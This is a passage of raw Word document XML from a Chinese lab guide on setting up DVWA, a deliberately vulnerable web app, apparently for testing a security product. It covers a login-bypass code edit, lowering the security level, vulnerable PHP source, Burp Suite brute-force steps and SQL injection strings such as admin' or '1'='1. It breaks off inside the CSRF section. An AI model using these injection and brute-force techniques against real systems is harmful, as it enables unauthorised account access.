          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>[php]</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:rPr>
          <w:t>view plain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:rPr>
          <w:t>copy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> dvwaIsLoggedIn() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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t>    $dvwaSession =&amp; dvwaSessionGrab();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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FFFFF"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> isset( $dvwaSession[ 'username' ] );  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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lastRenderedPageBreak/>
        <w:t>}  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>更改后的函数定义:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>[php]</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:rPr>
          <w:t>view plain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:rPr>
          <w:t>copy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> dvwaIsLoggedIn() {  </w:t>
      </w:r>
    </w:p>
    <w:p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t>    $dvwaSession =&amp; dvwaSessionGrab();  </w:t>
      </w:r>
    </w:p>
    <w:p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FFFFF"/>
        </w:rPr>
        <w:t>    $dvwaSession[ 'username' ]='admin';  </w:t>
      </w:r>
    </w:p>
    <w:p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t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t> isset( $dvwaSession[ 'username' ] );  </w:t>
      </w:r>
    </w:p>
    <w:p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FFFFF"/>
        </w:rPr>
        <w:t>}  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>更改后取消登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2)设置默认的安全等级：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>打开/xampp/htdocs/DVWA/config/config.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$_DVWA[ 'default_security_level' ] = '</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>impossible</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修改为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$_DVWA[ 'default_security_level' ] = 'low';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注意在取消默认登录或者更改默认的安全等级后，需要重新setup一下dvwa，参照安装步骤5和6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="009655A2" w:rsidP="009655A2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:t xml:space="preserve">3.1.1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DVWA漏洞利用简要介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DVWA上不同类型的漏洞包括low，middle，high三种等级，代表利用的难易程度，我们这里就简要介绍下low级别时漏洞的利用，覆盖更多的攻击手段，从而检验我们的安全防护产品是否能检测拦截所有的攻击行为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="009655A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Brute Force</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Brute Force，即暴力（破解），是指黑客利用密码字典，使用穷举法猜解出用户口令，是现在最为广泛使用的攻击手法之一，如2014年轰动全国的12306“撞库”事件，实质就是暴力破解攻击。</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4B8F4CE3" wp14:editId="53856D1E">
            <wp:extent cx="5167223" cy="2932982"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="13" name="图片 13" descr="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488" cy="2933700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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lt;?php</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w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>($_GET['Login'])){</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Getusername</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user=$_GET['username'];</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Getpassword</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pass=$_GET['password'];</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pass=md5($pass);</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Checkthedatabase</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query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';";</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result=mysql_query($query)ordie('&lt;pre&gt;'.mysql_error().'&lt;/pre&g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result&amp;&amp;mysql_num_rows($result)==1){</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Getusersdetails</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avatar=mysql_result($result,0,"avatar");</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Loginsuccessful</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cho</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>"&lt;p&gt;Welcometothepasswordprotectedarea{$user}&lt;/p&g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cho</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>"&lt;imgsrc="{$avatar}"/&g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lse</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w: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Loginfailed</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cho</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>"&lt;pre&gt;&lt;br/&gt;Usernameand/orpasswordincorrect.&lt;/pre&g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mysql_close();</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w:t>
      </w:r>
    </w:p>
    <w:p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g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服务器只是验证了参数Login是否被设置（isset函数在php中用来检测变量是否设置，该函数返回的是布尔类型的值，即true/false），没有任何的防爆破机制，且对参数username、password没有做任何过滤，存在明显的sql注入漏洞。</w:t>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方法一爆破利用burpsuite即可完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第一步抓包</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40B7EAC5" wp14:editId="6AB65D5B">
            <wp:extent cx="5296619" cy="2570671"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="12" name="图片 12" descr="图片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8842" cy="257175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第二步，ctrl+I将包复制到intruder模块，因为要对password参数进行爆破，所以在password参数的内容两边加$</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1286B6F" wp14:editId="36AE796F">
            <wp:extent cx="5296619" cy="2629331"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="图片 11" descr="图片1.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750" cy="262890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第三步选中Payloads，载入字典，点击Start attack进行爆破</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5E7577C1" wp14:editId="5B801E8C">
            <wp:extent cx="5244861" cy="5313872"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="10" name="图片 10"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25" cy="5314950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D20CF3A" wp14:editId="4EBAD343">
            <wp:extent cx="5253487" cy="2475781"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1270"/>
            <wp:docPr id="9" name="图片 9"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013" cy="247650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最后，尝试在爆破结果中找到正确的密码，可以看到password的响应包长度（length）“与众不同”，可推测password为正确密码，手工验证登陆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7047A075" wp14:editId="06E390A8">
            <wp:extent cx="5287993" cy="2843101"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="8" name="图片 8"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058" cy="284797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方法二手工sql注入</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1. Username:admin’ or ’1′=’1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Password:（空）</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注入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63314316" wp14:editId="73E79CD3">
            <wp:extent cx="5313872" cy="2162425"/>
            <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
            <wp:docPr id="7" name="图片 7"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257" cy="216217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2. Username :admin’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Password :（空）</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注入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77831D5" wp14:editId="791C707F">
            <wp:extent cx="5279366" cy="2523325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6"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039" cy="2524125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="009655A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>CSRF(Cross-site request forgery)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CSRF，全称Cross-site request forgery，翻译过来就是跨站请求伪造，是指利用受害者尚未失效的身份认证信息（cookie、会话等），诱骗其点击恶意链接或者访问包含攻击代码的页面，在受害人不知情的情况下以受害者的身份向（身份认证信息所对应的）服务器发送请求，从而完成非法操作（如转账、改密等）。CSRF与XSS最大的区别就在于，CSRF并没有盗取cookie而是直接利用。在2013年发布的新版OWASP Top 10中，CSRF排名第8。</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314BA36" wp14:editId="5D38900B">
            <wp:extent cx="5089237" cy="3209027"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="图片 27" descr="1.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654" cy="3209290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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GET[ 'Change' ] ) ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Get input </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $pass_new  = $_GET[ 'password_new' ]; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $pass_conf = $_GET[ 'password_conf' ]; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>    // Do the passwords match?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pass_new == $pass_conf ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        // They </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>! </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $pass_new = mysql_real_escape_string( $pass_new ); </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $pass_new = md5( $pass_new ); </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        // Update the database </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
